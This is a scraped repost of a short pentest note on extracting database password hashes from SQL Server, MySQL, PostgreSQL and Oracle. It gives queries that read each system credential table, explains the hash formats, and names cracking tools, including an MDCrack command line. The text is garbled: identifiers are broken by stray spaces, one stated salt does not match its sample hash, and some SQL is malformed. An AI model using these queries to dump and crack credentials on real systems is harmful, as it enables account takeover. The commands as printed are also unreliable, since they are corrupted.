Database Password Hashes Cracking

Source: Internet
Author: User

Notsosecure.com

SQL2000:-Server

SELECT password from master. dbo. sysxlogins where name = sa

0 × 010010967d5c0cfa5fdca28c4a56085e65e882e71cb0ed250341

2FD54D6119FFF04129A1D72E7C3194F7284A7F3A


0 × 0100-constant header

34767D5C-salt

0CFA5FDCA28C4A56085E65E882E71CB0ED250341-case senstive hash

2FD54D6119FFF04129A1D72E7C3194F7284A7F3A-upper case hash

Crack the upper case hash in cain and abel and then work the case sentive hash

 


SQL server 2005 :-

SELECT password_hash FROM sys. SQL _logins where name = sa

0 × 0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F

0 × 0100-constant header

993BF231-salt

5F36CC441485B35C4D84687DC02C78B0E680411F-case sensitive hash

Crack case sensitive hash in cain, try brute force and dictionary based attacks.

 

Update:-following bernardos comments :-

Use function fn_varbintohexstr () to cast password in a hex string.

E.g. select name from sysxlogins union all select master. dbo. fn_varbintohexstr (password) from sysxlogins

 

MYSQL :-

In MySQL you can generate hashes internally using the password (), md5 (), or sha1 functions. password () is the function used for MySQLs own user authentication system. it returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5 () is available from MySQL version 3.23.2 and sha1 () was added later in 4.0.2.

 

* Mysql <4.1

 

Mysql> select password (mypass );

+ ------- +

| PASSWORD (mypass) |

+ ------- +

| 6f8c114b58f2ce9e |

+ ------- +

 

* Mysql >=4.1

 

Mysql> select password (mypass );

+ --------------- +

| PASSWORD (mypass) |

+ --------------- +

| * 6c8989108eaf75bb670ad8ea7a7fc1176a95cef4 |

+ --------------- +


Select user, password from mysql. user

The hashes can be cracked in cain and abel

 

Postgres :-

Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql ")

Select usename, passwd from pg_shadow;

Usename | passwd

------ + -------------

Testuser | md5fabb6d7172aadfda4753bf0507ed4396

Use mdcrack to crack these hashes :-

$ Wine MDCrack-sse.exe-algorithm = MD5-append = testuser fabb6d7172aadfda4753bf0507ed4396


Oracle :-


Select name, password, spare4 from sys. user $

Hashes cocould be cracked using cain and abel or thc-orakelcrackert11g

More on Oracle later, I am a bit bored ....

References/Copied from :-

Html> http://hkashfi.blogspot.com/2007/08/breaking-sql-server-2005-hashes.html

Mysql.com/doc/refman/5.0/en/password-hashing.html "> http://dev.mysql.com/doc/refman/5.0/en/password-hashing.html

Http://pentestmonkey.net/blog/cracking-postgres-hashes/

Http://freeworld.thc.org/thc-orakelcrackert11g/


 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.